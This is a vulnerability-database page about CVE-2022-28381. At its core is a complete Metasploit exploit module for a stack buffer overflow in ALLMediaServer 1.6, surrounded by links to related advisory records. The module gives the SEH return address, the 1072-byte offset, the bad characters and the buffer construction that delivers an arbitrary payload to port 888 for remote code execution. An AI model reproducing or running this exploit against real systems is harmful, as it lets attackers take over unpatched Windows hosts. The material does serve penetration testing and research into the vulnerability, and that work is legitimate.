Lucene search
K

ALLMediaServer 1.6 Buffer Overflow

🗓️ 04 Apr 2022 00:00:00Reported by Hejap Zairy, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 326 Views

ALLMediaServer 1.6 Buffer Overflow exploit - stack buffer overflow in handling of HTTP request

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ALLMediaServer 1.6 Buffer Overflow Exploit
6 Apr 202200:00
zdt
ATTACKERKB
CVE-2022-28381
3 Apr 202219:15
attackerkb
Circl
CVE-2022-28381
3 Apr 202222:26
circl
CNNVD
Microsoft ALLMediaServer 缓冲区错误漏洞
3 Apr 202200:00
cnnvd
CVE
CVE-2022-28381
3 Apr 202218:30
cve
Cvelist
CVE-2022-28381
3 Apr 202218:30
cvelist
Metasploit
ALLMediaServer 1.6 SEH Buffer Overflow
5 Apr 202217:42
metasploit
NVD
CVE-2022-28381
3 Apr 202219:15
nvd
Prion
Stack overflow
3 Apr 202219:15
prion
Rapid7 Blog
Metasploit Wrap-Up
8 Apr 202217:50
rapid7blog
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
# Author: Hejap Zairy  
# Date: 1.08.2022  
# Exploit Prof  
# Proof and Exploit:  
#image:https://i.imgur.com/yLrRR2t.png  
#video:https://streamable.com/x4i50c  
  
  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ALLMediaServer 1.6 Buffer Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in ALLMediaServer 1.6  
The vulnerability is caused due to a boundary error within the  
handling of HTTP request.  
Thank you Saud Alenazi and 0xSaudi   
and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module  
],  
'DefaultOptions' =>  
{  
'ExitFunction' => 'process', #none/process/thread/seh  
},  
'Platform' => 'win',  
'Payload' =>  
{  
'BadChars' => '\x00\x0a\x0d\xff'   
},  
  
'Targets' =>  
[  
[ 'ALLMediaServer 1.6 / Windows 10 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
[ 'ALLMediaServer 1.6 / Windows XP SP3 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
[ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Apr 1 2022',  
'DefaultTarget' => 1))  
  
register_options([Opt::RPORT(888)], self.class)  
  
end  
  
def exploit  
connect  
buffer = ""  
buffer << make_nops(target['Offset'])  
buffer << "\xeb\x06\x90\x90"  
buffer << "\x0B\x59\x40\x00"  
buffer << make_nops(100)  
buffer << payload.encoded  
buffer << make_nops(50)  
print_status("Sending payload ... \n Exploit MediaServer")  
sock.put(buffer)  
handler  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2022 00:00Current
1Low risk
Vulners AI Score1
EPSS0.79342
326